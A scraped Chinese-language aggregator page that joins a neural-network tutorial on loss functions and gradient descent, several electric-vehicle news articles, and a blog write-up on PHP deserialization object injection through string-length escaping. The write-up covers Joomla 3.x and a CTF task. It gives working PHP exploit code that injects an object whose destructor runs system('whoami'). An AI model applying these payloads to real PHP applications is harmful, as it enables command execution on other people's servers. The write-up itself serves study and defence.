系列博客，原文在筆者所維護的github上：，
點擊star加星不要吝嗇，星越多筆者越努力。

第2章 神經網絡中的三個基本概念

2.0 通俗地理解三大概念

這三大概念是：反向傳播，梯度下降，損失函數。

神經網絡訓練的最基本的思想就是：先“猜”一個結果，我們叫預測結果a，看看這個預測結果和事先標記好的訓練集中的真實結果y之間的差距，然後調整策略，再試一次，這一次就不是“猜”了，而是有依據地向正確的方向靠近。如此反覆多次，一直到預測結果和真實結果之間相差無幾，亦即|a-y|->0，就結束訓練。

在神經網絡訓練中，我們把“猜”叫做初始化，可以隨機，也可以根據以前的經驗給定初始值。即使是“猜”，也是有技術含量的。

這三個概念是前後緊密相連的，講到一個，肯定會牽涉到另外一個。但由於損失函數篇幅較大，我們將在下一章中再詳細介紹。

下面我們舉幾個例子來直觀的說明下這三個概念。

2.0.1 例一：猜數

甲乙兩個人玩兒猜數的遊戲，数字的範圍是[1,50]：

甲：我猜5

乙：太小了

甲：50

乙：有點兒大

甲：30

乙：小了

……

在這個遊戲里：

• 目的：猜到乙心中的数字；
• 初始化：甲猜5；
• 前向計算：甲每次猜的新数字；
• 損失函數：乙在根據甲猜的數來和自己心中想的數做比較，得出“大了”或“小了”的結論；
• 反向傳播：乙告訴甲“小了”、“大了”；
• 梯度下降：甲根據乙的反饋中的含義自行調整下一輪的猜測值。

這裏的損失函數是什麼呢？就是“太小了”，“有點兒大”，很不精確！這個“所謂的”損失函數給出了兩個信息：

1. 方向：大了或小了
2. 程度：“太”，“有點兒”，但是很模糊

2.0.2 例二：黑盒子

假設有一個黑盒子如圖2-1。

圖2-1 黑盒子

我們只能看到輸入和輸出的數值，看不到裏面的樣子，當輸入1時，輸出2.334，然後黑盒子有個信息显示：我需要輸出值是4。然後我們試了試輸入2，結果輸出5.332，一下子比4大了很多。那麼我們第一次的損失值是\(2.334-4=-1.666\)，而二次的損失值是\(5.332-4=1.332\)。

這裏，我們的損失函數就是一個簡單的減法，用實際值減去目標值，但是它可以告訴你兩個信息：1）方向，是大了還是小了；2）差值，是0.1還是1.1。這樣就給了我們下一次猜的依據。

• 目的：猜到一個輸入值，使得黑盒子的輸出是4
• 初始化：輸入1
• 前向計算：黑盒子內部的數學邏輯
• 損失函數：在輸出端，用輸出值減4
• 反向傳播：告訴猜數的人差值，包括正負號和值
• 梯度下降：在輸入端，根據正負號和值，確定下一次的猜測值，goto前向計算

2.0.3 例三：打靶

小明拿了一支步槍，射擊100米外的靶子。這支步槍沒有準星，或者是準星有問題，或者是小明眼神兒不好看不清靶子，或者是霧很大，或者風很大，或者由於木星的影響而側向引力場異常……反正就是遇到各種干擾因素。

第一次試槍后，拉回靶子一看，彈着點偏左了，於是在第二次試槍時，小明就會有意識地向右側偏幾毫米，再看靶子上的彈着點，如此反覆幾次，小明就會掌握這支步槍的脾氣了。圖2-2显示了小明的5次試槍過程。

圖2-2 打靶的彈着點記錄

在有監督的學習中，需要衡量神經網絡輸出和所預期的輸出之間的差異大小。這種誤差函數需要能夠反映出當前網絡輸出和實際結果之間一種量化之後的不一致程度，也就是說函數值越大，反映出模型預測的結果越不準確。

這個例子中，小明預期的目標是全部命中靶子的中心，最外圈是1分，之後越向靶子中心分數是2，3，4分，正中靶心可以得10分。

• 每次試槍彈着點和靶心之間的差距就叫做誤差，可以用一個誤差函數來表示，比如差距的絕對值，如圖中的紅色線。
• 一共試槍5次，就是迭代/訓練了5次的過程 。
• 每次試槍后，把靶子拉回來看彈着點，然後調整下一次的射擊角度的過程，叫做反向傳播。注意，把靶子拉回來看和跑到靶子前面去看有本質的區別，後者容易有生命危險，因為還有別的射擊者。一個不恰當的比喻是，在數學概念中，人跑到靶子前面去看，叫做正向微分；把靶子拉回來看，叫做反向微分。
• 每次調整角度的數值和方向，叫做梯度。比如向右側調整1毫米，或者向左下方調整2毫米。如圖中的綠色矢量線。

上圖是每次單發點射，所以每次訓練樣本的個數是1。在實際的神經網絡訓練中，通常需要多個樣本，做批量訓練，以避免單個樣本本身採樣時帶來的誤差。在本例中，多個樣本可以描述為連發射擊，假設一次可以連打3發子彈，每次的離散程度都類似，如圖2-3所示。

圖2-3 連發彈着點記錄

• 如果每次3發子彈連發，這3發子彈的彈着點和靶心之間的差距之和再除以3，叫做損失，可以用損失函數來表示。

那小明每次射擊結果和目標之間的差距是多少呢？在這個例子裏面，用得分來衡量的話，就是說小明得到的反饋結果從差9分，到差8分，到差2分，到差1分，到差0分，這就是用一種量化的結果來表示小明的射擊結果和目標之間差距的方式。也就是誤差函數的作用。因為是一次只有一個樣本，所以這裏採用的是誤差函數的稱呼。如果一次有多個樣本，就要叫做損失函數了。

其實射擊還不這麼簡單，如果是遠距離狙擊，還要考慮空氣阻力和風速，在神經網絡里，空氣阻力和風速可以對應到隱藏層的概念上。

在這個例子中：

• 目的：打中靶心；
• 初始化：隨便打一槍，能上靶就行，但是要記住當時的步槍的姿態；
• 前向計算：讓子彈飛一會兒，擊中靶子；
• 損失函數：環數，偏離角度；
• 反向傳播：把靶子拉回來看；
• 梯度下降：根據本次的偏差，調整步槍的射擊角度，goto前向計算。

損失函數的描述是這樣的：

1. 1環，偏左上45度；
2. 6環，偏左上15度；
3. 7環，偏左；
4. 8環，偏左下15度；
5. 10環。

這裏的損失函數也有兩個信息：

1. 距離；
2. 方向。

所以，梯度，是個矢量！ 它應該即告訴我們方向，又告訴我們數值。

2.0.4 黑盒子的真正玩兒法

以上三個例子比較簡單，容易理解，我們把黑盒子再請出來：黑盒子這件事真正的意義並不是猜測當輸入是多少時輸出會是4。它的實際意義是：我們要破解這個黑盒子！於是，我們會有如下破解流程：

1. 記錄下所有輸入值和輸出值，如表2-1。

表2-1 樣本數據表

樣本ID	輸入(特徵值)	輸出(標籤)
1	1	2.21
2	1.1	2.431
3	1.2	2.652
4	2	4.42

1. 搭建一個神經網絡，給出初始權重值，我們先假設這個黑盒子的邏輯是：\(z=x + x^2\)；
2. 輸入1，根據\(z=x + x^2\)得到輸出為2，而實際的輸出值是2.21，則誤差值為\(2-2.21=-0.21\)，小了；
3. 調整權重值，比如\(z=1.5x+x^2\)，再輸入1.1，得到的輸出為2.86，實際輸出為2.431，則誤差值為\(2.86-2.431=0.429\)，大了；
4. 調整權重值，比如\(z=1.2x+x^2\)再輸入1.2……
5. 調整權重值，再輸入2……
6. 所有樣本遍歷一遍，計算平均的損失函數值；
7. 依此類推，重複3，4，5，6過程，直到損失函數值小於一個指標，比如0.001，我們就可以認為網絡訓練完畢，黑盒子“破解”了，實際是被複制了，因為神經網絡並不能得到黑盒子里的真實函數體，而只是近似模擬。

從上面的過程可以看出，如果誤差值是正數，我們就把權重降低一些；如果誤差值為負數，則升高權重。

2.0.5 總結

簡單總結一下反向傳播與梯度下降的基本工作原理：

1. 初始化；
2. 正向計算；
3. 損失函數為我們提供了計算損失的方法；
4. 梯度下降是在損失函數基礎上向著損失最小的點靠近而指引了網絡權重調整的方向；
5. 反向傳播把損失值反向傳給神經網絡的每一層，讓每一層都根據損失值反向調整權重；
6. goto 2，直到精度足夠好（比如損失函數值小於0.001）。

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理【其他文章推薦】

※台北網頁設計公司這麼多，該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

※網頁設計公司推薦更多不同的設計風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

眾所矚目的電動車品牌特斯拉（Tesla）狀況不斷，先是Autopilot自動駕駛功能出包，最近又傳出車輛自燃事故。無獨有偶的，台灣的電動車品牌納智捷（Luxgen）也傳出車輛起火，引發各界的安全性關注。

外媒報導，一輛Tesla Model S 90D 在法國提供消費者試駕服務時突然傳出巨響，儀表板並顯示充電系統發生問題；在消費者與特斯拉的司機下車後，車輛即陷入火海，並很快燒個精光。由於這不是特斯拉首次發生火燒車事故，特斯拉立即表示會配合法國相關單位調查事故原因。

另一方面，位於新北市的裕隆汽車大樓於8月17日中午傳出失火意外，起火點是停放在地下室的一輛電動車，車款為LUXGEN MVP EV。據了解，該車目前僅供集團公務使用，並在特定地點供民眾租用，還沒有上市販售。裕隆汽車公關對外表示，起火前曾對該電動車進行測試，疑似車內電線走火才引發火災，將配合調查失火原因。

特斯拉車輛剛出現失火意外時，曾被懷疑是電池防護性不足的問題，因此在車底加上了防護板，但仍無法完全解決問題，甚至有充電途中起火燃燒的案例。而納智捷也被懷疑因電力系統走火而造成失火，電動車的電系零件安全性因而備受關注。

（照片：在法國起火的特斯拉電動車。來源：翻攝網路）

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※台北網頁設計公司這麼多，該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

※網頁設計公司推薦更多不同的設計風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

底特律電動汽車是由位於底特律的Anderson電動汽車公司生產的一款純電動汽車品牌，底特律電動汽車品牌在2008年的時候正式回歸市場。  
  雖然旗下的SP:01車型還沒有真正的上市銷售，但是根據消息稱，該品牌的電動汽車已經計畫在2019年將推出兩款全新的純電動車型。有趣的是，與特斯拉一樣，它推出的首款進軍汽車市場的車型是一款純電動車型；另外，其SP:01也是在Lotus Elise車型的基礎上打造而來的純電動車型。但是底特律電動汽車卻極力與特斯拉劃清界限，聲稱他們並不是步特斯拉的後塵。   在其SP:01車型正式發佈之後，近日底特律電動汽車已經開始投入另外兩款全新的純電動車型的研發工作，一款為SUV車型；一款為轎車車型。但是，他們同特斯拉有著較大的區別。底特律電動汽車聲稱，在其新款電動車型推向市場的同時還將實現年產50000到60000的產量目標。   文章來源：鳳凰汽車

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※台北網頁設計公司這麼多，該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

※網頁設計公司推薦更多不同的設計風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

電動車市場逐漸步上正軌，先前許多大動作要進入電動車領域，喊出或暗示要打造電動車的電子大廠卻開始打退堂鼓。在諸多電子大廠的退卻潮下，Sony 千山萬水我獨行，推出 Vision-S 電動概念車，是「人棄我取」的逆行觀念，還是只是「項莊舞劍，意在沛公」？

以蘋果（Apple）來說，先前曾經傳出「泰坦計畫」（Project Titan）要在 2019 年推出自家電動車，2019 年都過去了，卻無消無息，事實上蘋果在幾年前就改換電動車領域的發展方向，雖然蘋果仍不斷在電動車領域申請專利，但是專利大多集中在資訊娛樂系統，以及自動駕駛軟體，而非打造一輛完整的車。

英國吸塵器大廠戴森（Dyson），原本對電動車也有雄圖大略，2015 年購併固態電池新創事業 Sakti3 後，原本有 25 億英鎊的大計畫，包括 2018 年在新加坡建廠，以及打造電動車，到 2019 年 10 月，戴森打了退堂鼓，表示儘管研發極盡努力，卻無法打造出商業可獲利的車款。

蘋果與戴森的退卻，顯示一個基本問題，那就是即使電動車跳過最複雜的內燃機引擎部分，打造汽車仍是相當高技術門檻的事，並非藉由電子方面的專長就能打造電動車。要打造一輛能熬過日曬雨淋下雪，在路上經歷 15 年的車輛，是相當複雜且需要工程技術的任務，汽車大廠數十年來精研於此，就算排除內燃機引擎部分，仍非一朝一夕可超越。

Google 於 2016 年將自駕車部門獨立成為 Waymo，Waymo 也放棄自己打造自駕車，2019 年 Waymo 在亞利桑那州開始試營運自駕計程車，不過使用的是第三方車廠的車改造，克萊斯勒（Chrysler）Pacifica，以及捷豹（Jaguar）I-Pace，而非自行打造。

自動駕駛的軟硬體技術方面，科技大廠顯然仍興致高昂、摩拳擦掌，但要打造整輛車，這個主意從來都不現實。一開始科技大廠看到電動車能跳脫汽車業最困難尖端的內燃機引擎技術，替代為電子電機大廠熟悉的馬達與鋰電池，見獵心喜，認為這是打入長期由車廠壟斷的市場的良機，但很快就發現，汽車市場早已是割喉戰，要跳進去規模量產汽車，跟著割喉，並不是個好主意。

科技大廠打退堂鼓的根本原因，在於打造整輛車，毛利率遠低於軟體與消費性電子產品，這些原本位於高毛利產業的大廠，稍事研究後，就對進軍「茅山道士」（毛利 3%~4%）產業敬謝不敏，不如安於於當軟體技術與關鍵硬體供應商，因此蘋果樂於打造車用資訊娛樂系統軟體平台，而戴森樂於供應電池，但不想做整輛車。

此外，割喉戰還會越來越嚴重，原本只有特斯拉（Tesla）領頭開拓電動車市場，如今幾乎主要車廠都已經大力投入，而特斯拉本身也已經往平價車款發展，另一方面，中國廠商磨刀霍霍，想在中國低價電池廠的產能撐腰下積極投入，很快電動車市場就會如傳統汽車市場「割喉割到斷」，而且恐怕比過去更激烈。

中國本身 IT 巨頭，也採用投資的方式加入電動車市場，而非自身投入打造電動車，如騰訊投資和諧富騰、阿里巴巴投資小鵬汽車。連中國巨頭企業都迴避這個紅海戰場，那麼也就難怪歐美大廠從本來有興趣，改為退避三舍了。

千山萬水，Sony 獨行？

此股退卻潮中，唯一逆向而行的，大概只有日本電子大廠 Sony。2020 年 CES，Sony 宣布 Vision-S 概念電動車原型，車內車外內建 33 種不同感測器，車內資訊娛樂系統有好幾個寬螢幕顯示器、360 度環場音效、常時連線（always-on connectivity），其中部分技術來自音響大廠博世（Bosch），以及黑莓（BlackBerry）的行動無線通訊技術。此外，Sony 更打造全新設計的電動車平台，來自加拿大汽車零件供應大廠麥格納（Magna），不僅支援轎車也支援休旅車。

Vision-S 概念電動車相當有未來感，不過產業界對 Vision-S 最想知道的是：Sony 與麥格納，真的打算將這款車規模生產商業上市嗎？還是只是藉此展示車用平台及相關零組件、感測器、軟硬體技術？發表會當天，Sony 電動車發表時間並不長，且還強調 Sony 以影像感測器部門積極投資自動駕駛相關技術，包括強化原本的 CMOS，以及發展光雷達（LIDAR）、飛時測距鏡頭（Time-of-flight camera），以及複合多種感測器強化對環境的辨認能力。

就此看來， Sony 與麥格納仍是定位自身為平台與關鍵零組件供應商，Vision-S 概念電動車較可能只是為了展示所有想推銷給各大車廠的相關技術，而非真要把 Vision-S 掛上 Sony 品牌上市，否則，恐怕先要遭受全球車廠客戶抵制，得不償失。

無論如何，至少 Sony 還敢推出概念電動車原型，成為電子大廠進攻電動車市場的最後勇者，到底是「項莊舞劍，意在沛公」，最後跟其他電子大廠一樣只當車用平台零組件與軟硬體供應商，還是真會自己跳下去製造電動車，就看 Sony 有沒有豪賭的勇氣了。

（合作媒體：。首圖為Vision-S 電動概念車，來源：）

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※台北網頁設計公司這麼多，該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

※網頁設計公司推薦更多不同的設計風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

在6月6日舉辦的股東會議上，Tesla創辦人Elon Musk提到將在全球建至少10座到20座超級電池工廠（Gigafactory）以供應市場需求。

過去，Elon Musk曾提到以全球對電動車和儲能電池的需要，需要100座Gigafactory來應付市場需求。外媒指出，Elon Musk這番發言也暗示Tesla未來將佔全球10%的儲能和電動車的產能。

Tesla於美國內華達州的Gigafactory 1目前仍持續建造並且已進行鋰電池生產，Elon Musk於股東會議中提到，當Gigafactory 1產能全開時，其生產的鋰電池數量將會比全球其餘鋰電池工廠生產的總和還要多。

與Panasonic的合作使Tesla在生產池上有極大的優勢，其最終目標是生產先進且低價的鋰電池，同時Tesla視Gigafactory為一個「巨型機器」，會不斷改善和優化。

至於目前未來規劃中的3、4座Gigafactory的廠址還未定案，日前Elon Musk表示，2017年底將宣布它們的落腳處。由於Tesla位於加州費利蒙的工廠生產線已滿載，因此其中一座未來的Gigafactory將會用來生產新型SUV Model Y，其生產線也會於其他Gigafactory不同。

（圖片來源：Tesla Club Belgium via Flickr CC2.0）

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※台北網頁設計公司這麼多，該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

※網頁設計公司推薦更多不同的設計風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

1.漏洞產生原因：

序列化的字符串在經過過濾函數不正確的處理而導致對象注入，目前看到都是因為過濾函數放在了serialize函數之後，要是放在序列化之前應該就不會產生這個問題

?php
function filter($string){
  $a = str_replace('x','zz',$string);
   return $a;
}

$username = "tr1ple";
$password = "aaaaax";
$user = array($username, $password);

echo(serialize($user));
echo "\n";

$r = filter(serialize($user));

echo($r);
echo "\n";

var_dump(unserialize($r));
$a='a:2:{i:0;s:6:"tr1ple";i:1;s:5:"aaaaa";}i:1;s:5:"aaaaa";';
var_dump(unserialize($a));

php特性：

1.PHP 在反序列化時，底層代碼是以 ; 作為字段的分隔，以 } 作為結尾(字符串除外)，並且是根據長度判斷內容的
2.對類中不存在的屬性也會進行反序列化

以上代碼就明顯存在一個問題，即從序列化后的字符串中明顯可以看到經過filter函數以後s:6對應的字符串明顯變長了

並且如果對於a:2:{i:0;s:6:”tr1ple”;i:1;s:5:”aaaaa”;}i:1;s:5:”aaaaa”; 這種字符串而言，也能夠正常反序列化，說明php在反序列化的時候只要求一個反序列化字符串塊合法即可，當然得是第一個字符串塊

以以上代碼為例，如果能夠利用filter函數這種由一個字符變為兩個字符的特性來注入想要反序列化后得到的屬性，使其可以逃逸出更多可用的字符串，那麼我們就能反序列化得到我們想要的屬性

比如此時我們想要讓反序列化后第二個字符串為123456，此時我們的payload如果和之前的username長度為a，則filter處理以後可能username就會變成a，此時我們的payload變成了新的注入的屬性，此時反序列化后就會得到我們想要的結果，比如a:2:{i:0;s:6:”tr1ple”;i:1;s:6:”123456″;}是我們想要達到的效果，此時我們想要注入的payload明顯為：

";i:1;s:6:"123456";}

 

可以得到其長度為20

此時我們已經知道過濾的規則為x->yy，即注入一個x可以逃逸出一個字符的空位，那麼我們只需要注入20個x即可變成40個y，即可逃逸出20個空位，從而將我們的payload變為反序列化后得到的屬性值

$username = 'tr1plexxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}'; //其中紅色就是我們想要注入的屬性值 
$password="aaaaa";
$user = array($username, $password);
echo(serialize($user));
echo "\n";

$r = filter(serialize($user));

echo($r);
echo "\n";
var_dump(unserialize($r));

 可以看到此時注入屬性成功，反序列化后得到的屬性即為123456

2.實例分析

joomla3.0.0-3.4.6 對象注入導致的反序列化,以下為參考別人的簡易化核心漏洞代碼

<?php
class evil{
    public $cmd;

    public function __construct($cmd){
        $this->cmd = $cmd;
    }

    public function __destruct(){
        system($this->cmd);
    }
}

class User
{
    public $username;
    public $password;

    public function __construct($username, $password){
        $this->username = $username;
        $this->password = $password;
    }

}

function write($data){
    $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);
    file_put_contents("dbs.txt", $data);
}

function read(){
    $data = file_get_contents("dbs.txt");
    $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);
    return $r;
}

if(file_exists("dbs.txt")){
    unlink("dbs.txt");  
}

$username = "tr1ple";
$password = "A";
$payload = '";s:8:"password";O:4:"evil":1:{s:3:"cmd";s:6:"whoami";}'; write(serialize(new User($username, $password))); var_dump(unserialize(read()));

在這裏如果想要通過注入對象來實現反序列化則必須在外部對象內進行注入存在的屬性，不能在其外部，否則php將不會進行我們注入惡意對象的反序列化

例如此時因為反序列化讀取的時候將會將六位字符\0\0\0替換成三位字符chr(0)*chr(0),因此字符串前面的s肯定是固定的，那麼s對應的字符串變少以後將會吞掉其他屬性的字符，那麼如果我們精心算好吞掉的字符長度，並且能夠控制被吞掉屬性的內容，那麼就能夠注入對象，從而反序列化其他類

比如如上所示，此時我們要注入的對象為evil，此時username和password的值我們可控，那麼我們可以在username中注入\0，來吞掉password的值，比如

<?php
$a='\0\0\0';
echo strlen($a);
$b=str_replace('\0\0\0', chr(0).'*'.chr(0), $a);
echo strlen($b);

 所以此時首先確定我們要吞掉的字符的長度

O:4:”User”:2:{s:8:”username”;s:6:”tr1ple”;s:8:”password”;s:4:”1234″;}

正常情況下我們要吞掉 “;s:8:”password”;s:4:” 為22位

但是因為注入的對象payload也在password字段，並且長度肯定是>=10的，因此s肯定是兩位數，因此這裏為22+1=23位字符

因為是6->3，因此每次添加一組\0\0\0能多吞掉3個字符，因此需要肯定都是3的倍數

因此我們假如這裏構造username為\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0 

 

 則經過read函數處理后長度將變為24

 即此時能夠多吞掉24個字符，為了不讓其吞掉payload，我們可以填充1位字符A，即令password的值為A+payload即可

<?php
class evil{
    public $cmd;

    public function __construct($cmd){
        $this->cmd = $cmd;
    }

    public function __destruct(){
        system($this->cmd);
    }
}

class User
{
    public $username;
    public $password;

    public function __construct($username, $password){
        $this->username = $username;
        $this->password = $password;
    }

}

function write($data){
    $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);
    file_put_contents("dbs.txt", $data);
}

function read(){
    $data = file_get_contents("dbs.txt");
    $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);
    return $r;
}

if(file_exists("dbs.txt")){
    unlink("dbs.txt");  
}

$username = "\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0";
$password = "A";
$payload = '";s:8:"password";O:4:"evil":1:{s:3:"cmd";s:6:"whoami";}'; $shellcode=$password.$payload; write(serialize(new User($username, $password))); var_dump(unserialize(read()));

 執行結果如上圖所示，將成功反序列化password屬性所對應的值，其值即為我們注入的對象，整個過程也容易理解，就是吞掉後面的屬性來注入屬性，那麼達到攻擊有以下要求：

1.相鄰兩個屬性的值是我們可以控制的

2.前一個屬性的s長度可以發生變化，變長變短都可以，變短的話可以吞掉後面相鄰屬性的值，然後在相鄰屬性中注入新的對象，如果邊長則可以直接在該屬性中注入對象來達到反序列化

 比如XNUCA2018 hardphp就考察了一個這個相關的trick

 

 這裏就出現了用前面的data在反序列化時向後吞一位字符，從而可以導致吞掉後面的普通用戶的username字段，而在username字段可以放上我們想要偽造的username，從而達到偽造session的目的

 參考：

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理【其他文章推薦】

※台北網頁設計公司這麼多，該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

※網頁設計公司推薦更多不同的設計風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

電動車爽領補貼、減免稅率的好日子快要結束？美國不少基礎建設早該翻修，各州為了尋找經費焦頭爛額，紛紛把腦筋動到電動車頭上。今(2017)年美國至少已有五州通過對電動車徵稅的法案，當中甚至包括對環保議題最為熱衷的加州。

CNBC 3日報導(見此)，美國包括加州在內的不少州，已在今年通過對電動車加稅，一年徵收100-200美元不等。加州州長布朗(Jerry Brown)在今年春季通過法案時表示，安全和順暢的道路，不但能使加州成為更佳的居住地，也會提振州內經濟活動，增加數千個工作機會。

加州的決定，顯示市場對電動車的心態已有轉變。美國不少州原本都對環保汽車相當友善，提出減稅補貼等獎勵措施，鼓勵駕駛人換車。如今各州財政緊繃，道路又坑坑巴巴、亟待修整，電動車便成了眾矢之的。自2013年以來，美國24州、華盛頓哥倫比亞特區都已決定調高電動車的燃料稅(gas tax)，其中加州把燃料稅調高12美分，以支應524億美元道路維修暨壅塞紓解方案的半數費用。

環保人士擔憂，這些費用可能會壓抑電動車的銷售量。不僅如此，購買電動車所享有的7,500美元聯邦減稅優惠，也會在電動車賣出20萬輛後遭到解除。根據汽車銷售暨資訊網站Edmunds.com估計，電動車對整體汽車市場的佔有率目前僅有0.6%，銷售量成長率則從2013年的227%，驟降至2016年的5%。

Barronˋs Next 5月9日報導，Edmunds當時就悲觀預測(見此)，電動車聯邦減稅優惠終結將摧毀美國電動車車市。當局規定，車商的前20萬名客戶，可以獲得補助，如今特斯拉(Tesla)已售出將近10萬輛電動車，估計明年優惠就會結束。

特斯拉平價車款「Model 3」定價3.5萬美元，扣掉7,500美元補貼之後，買家等於只要付2.75萬美元，差距極為明顯。特斯拉想打入大眾車市，必須對上2萬美元的汽油車和油電混合車，少了優惠之後，兩者價差更為懸殊。

以美國喬治亞州為例，該州取消購買電動車的5,000美元稅務優惠之後，買氣急凍。有稅務優惠時，喬治亞州佔全美電動車銷售的17%；取消之後，銷售比重驟降至2%。Edmunds據此推論，補助結束後，電動車市將崩盤。Edmunds報告指出，高檔電動車較不受稅務優惠影響，但是一般買家會在意補貼。補助終結後，電動車廠必須大砍售價，才能維持買氣。

（本文內容由授權使用。圖片出處：public domain CC BY 0）

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※台北網頁設計公司這麼多，該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

※網頁設計公司推薦更多不同的設計風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整